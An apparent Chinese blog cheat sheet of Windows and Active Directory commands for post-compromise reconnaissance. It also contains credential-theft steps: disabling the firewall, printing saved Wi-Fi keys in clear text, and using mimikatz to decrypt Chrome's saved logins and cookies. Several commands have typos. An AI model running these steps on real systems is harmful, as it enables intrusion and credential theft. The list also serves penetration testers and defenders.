内网渗透信息收集-windos

用户信息

# 查看本机用户列表
net user

# 获取本地管理员信息
net localgroup administrators

# 查看当前在线用户
quser
quser user
quser user || qwinsta

# 查当前用户在目标系统中的具体权限
whoami /all

#查看当前权限
whoami && whoami /priv

#查看当前机器中所有的组名,了解不同组的职能,如IT、HR、ADMIN、FILE
net localgroup

系统信息

# 查询网络配置信息,ip地址段信息收集
ifconfig /all

# 查询操作系统以及软件信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 英文系统 
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #中文系统

# 查看当前系统版本
wmic OS get Caption,CSDVersion,OSArchitecture,Version

#查看系统体系结构 
echo %PROCESSOR_ARCHITECTURE%

#查询本机服务信息 
wmic service list brief

#查看安装的软件的版本、路径等 
wmic product get name, version 
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"

#查询进程信息 
tasklist wmic process list brief

#查看启动程序信息 
wmic startup get command,caption

#查看计划任务 
at(win10之前) 
schtasks /query /fo LIST /v(win10)

#查看主机开机时间 
net statistics workstation

#列出或断开本地计算机与所连接的客户端的对话 
net session

# 查询端口列表,本机开放的端口所对应的服务和应用程序
netstat -ano/atnp

#查看远程连接信息 
cmdkey /l

#查看补丁列表 
systeminfo | findstr KB

#查看补丁的名称、描述、ID、安装时间等 
wmic qfe get Caption,Description,HotFixID,InstalledOn

#查看杀软 
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

#查看本地密码策略 
net accounts

#查看hosts文件: 
Linux:cat /etc/hosts 
Windows:type c:\Windows\system32\drivers\etc\hosts

#查看dns缓存 
ipconfig  /displaydns

网络信息

#查看本机所有的tcp,udp端口连接及其对应的pid 
netstat -ano

#查看本机所有的tcp,udp端口连接,pid及其对应的发起程序 
netstat -anob

#查看路由表和arp缓存 
route print 
arp -a

#查看本机共享列表和可访问的域共享列表 (445端口) 
net share 
wmic share get name,path,status

#磁盘映射 
net use k: \\192.168.1.10\c$

防火墙信息

#关闭防火墙(Windows Server 2003 以前的版本) 
netsh firewall set opmode disable 

#关闭防火墙(Windows Server 2003 以后的版本) 
netsh advfirewall set allprofiles state off

#查看防火墙配置(netsh命令也可以用作端口转发) 
netsh firewall show config

#查看配置规则 
netsh advfirewall firewall show rule name=all

wifi密码

netsh wlan show profile 
netsh wlan show profile name="HUAWEI-MINGY" key=clear

Chorme历史记录和Cookie获取

%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 
%localappdata%\google\chrome\USERDA~1\default\cookies

chrome的用户信息,保存在本地文件为sqlite 数据库格式

mimikatz.exe privilege::debug log "dpapi::chrome 
/in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit


mimikatz.exe privilege::debug log "dpapi::chrome 
/in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit

域内信息收集
Net组件

# 查询域
new view /domain

# 查询域内的所有计算机
net view /domain:mingym

# 查询域内所有用户组(Enterprise Admins组权限最大)
net group /domain

# 查看域管理员的用户组
net group "domain admins" /domain

 # 查询所有域成员计算机列表 
 net group "domain computers" /domain

# 查询域系统管理员用户组 
net group "Enterprise admins" /domain

# 查看域控制器 
net group "domain controllers" /domain

# 对比查看"工作站域DNS名称(域名)"和"登录域()域控制器"的信息是否相匹配 
net config workstation

#  查看域内所有账号 
net user /domain

# 查询指定用户的详情信息 
net user xxx /domain

# 查看时间可以找到域控 
net time /domain

# 查看域密码策略 
net accounts /domain

# 查看当前登录域 
net config workstation

# 登录本机的域管理员 
net localgroup administrators /domain

dsquery

# 查看当前域内的所有机器
dsquery computer

# 查看当前域内中 的所有账户名
dsquery user

# 查看当前域内 的所有组名
dsquery group

# 查看当前域所在的网段,结合nbtscan使用
dsquery subnet

# 查看域内所有的web站点
dsquery site

# 查看当前域内的服务器(一般结果只有域控的主机名)
dsquery server

# 查看前240个以admin开头的用户名
dsquery user domainroot -name admin* -limit 240

其他

# 查看域内信任关系
nltest /domain_trusts

# 查看域控制器的机器名
nltest /DCLIST:MINGY

# 查看域内邮件服务器
nslookup -q=mx mingy.com

# 查看域内DNS服务器
nslookup -q=ns mingy,com

# 查看域内的主控域,仅限win2008及以上系统
netdom query pdc

定位域控

 # ipconfig 
 ipconfig /all

# 查询dns解析记录 
nslookup -type=all _ldap._tcp.dc._msdcs.mingy.com

# spn扫描 
在SPN扫描结果中可以通过如下内容,来进行域控的定位。 

CN=DC,OU=Domain Controllers,DC=mingy,DC=com

 # net group 
 net group "domain controllers" /domain
 
# 端口识别 
端口:389 
服务:LDAP、ILS 
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

端口:53 
服务:Domain Name Server(DNS) 
说明:53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最 为广泛。通过DNS服务器可以实现域名与IP地址之间的转换,只要记住域名就可以快速访问网站。

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值